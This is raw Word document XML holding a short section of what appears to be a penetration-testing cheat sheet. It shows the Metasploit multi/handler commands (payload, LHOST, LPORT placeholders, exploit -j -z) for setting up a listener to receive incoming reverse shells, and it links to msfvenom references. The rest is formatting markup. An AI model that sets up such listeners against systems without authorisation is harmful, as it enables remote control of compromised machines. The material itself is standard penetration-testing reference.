        <w:t>Handlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316997E8"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color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.</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0500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736259" w:rsidRPr="00736259" w14:paraId="70EF5D17" w14:textId="77777777" w:rsidTr="00736259">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AF5796C"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use exploit</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multi</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>handler</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="763FEB6A"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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> PAYLOAD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Payload name</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3730C8"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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>set</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> LHOST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LHOST value</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19571218"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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> LPORT </w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LPORT value</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C5DE75B"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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ExitOnSession</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C20CB9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79815038" w14:textId="77777777" w:rsidR="00736259" w:rsidRPr="00736259" w:rsidRDefault="00736259" w:rsidP="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736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit </w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-j</w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00736259">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29D33929" w14:textId="77777777" w:rsidR="00736259" w:rsidRPr="00736259" w:rsidRDefault="00736259" w:rsidP="00736259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736259">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2744B2D6" w14:textId="77777777" w:rsidR="006F3807" w:rsidRDefault="006F3807"/>
    <w:sectPr w:rsidR="006F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59"/>
    <w:rsid w:val="00320EB1"/>
    <w:rsid w:val="003517F6"/>
    <w:rsid w:val="006F3807"/>
    <w:rsid w:val="00736259"/>
    <w:rsid w:val="00A24EA8"/>
    <w:rsid w:val="00C2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DA2D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{511717D0-1116-4F17-B12E-A839F404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36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25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36259"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="entry-meta">
    <w:name w:val="entry-meta"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00736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36259"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="entry-author-name">
    <w:name w:val="entry-author-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00736259"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007362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59"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00736259"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C20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68986">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1476142058">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2098793403">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1930236129">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2076851452">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="910041221">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="892618019">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="426194429">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="373309316">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1060397244">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="130901963">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1812862478">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1735663290">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="556472878">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="720514597">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1003509617">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="360"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="5108741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pid7/metasploit-framework/wiki/How-to-use-msfvenom" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/binary-pay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17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-21T18:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-21T18:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>